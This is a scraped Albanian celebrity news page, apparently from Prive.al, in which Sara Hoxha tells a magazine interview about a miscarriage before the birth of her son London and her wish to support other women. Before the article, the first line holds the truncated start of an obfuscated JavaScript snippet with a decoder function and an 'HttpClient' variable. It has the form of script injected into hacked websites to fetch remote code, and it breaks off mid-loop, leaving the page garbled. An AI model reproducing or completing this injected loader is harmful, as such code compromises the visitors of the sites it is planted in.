;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sara Hoxha rrëfen historinë e trishtë: Si e humbi ajo fëmijën e parë?

By

Sara Hoxha, trashëgimtarja e Top Medias, ka folur për herë të parë për një histori të trishtë në jetën e saj, një shtatzëni që nuk shkoi deri në fund, por që u ndërpre në mes dhe çifti e vuajti shumë.

Në një intervistë të veçantë nga bashkëshorti i saj Ledion Liço, për revistën “Who”, Sara zbuloi se London ishte planifikuar për të ardhur në këtë jetë, pas abortit spontan të fëmijës së parë.

View this post on Instagram

go read www.revistawho.com 💕

A post shared by Sara Hoxha (@sarahoxhaaa) on

“London ishte me vetëdije të plotë. Ne kemi patur një shtatzëni përpara London, që fatkeqësisht u ndërpre në mes, sepse zemra e bebit pushoi së rrahuri. Ti e mban mend se sa u mërzitëm për një fëmijë që ishte sa një kikirik, që as nuk e njohëm, dhe aty e kuptuam sa shumë donim që të krijonim një familje tonën”.

Arsyeja përse foli për këtë tani që familja e saj është e plotë është sepse Sara kërkon të mbështesë ato femra që kanë kaluar të njëjtën përvojë të hidhur:

“Dua ta them këtë, sepse është diçka që u ndodh shumë njerëzve, është shumë e trishtë, por dua që të kuptojnë që nuk është përfundimtare ajo ndjesi”.

Sara dhe Ledioni, u martuan në gusht të këtij viti në një ceremoni V.I.P në breg të Liqenit Como të Italisë, ku patën shumë të ftuar që janë figura publike të ekranit shqiptar, politikës dhe muzikës. /Prive.al

View this post on Instagram

thank you for all the sweet messages💕

A post shared by Sara Hoxha (@sarahoxhaaa) on

Artikuj të ngjashëm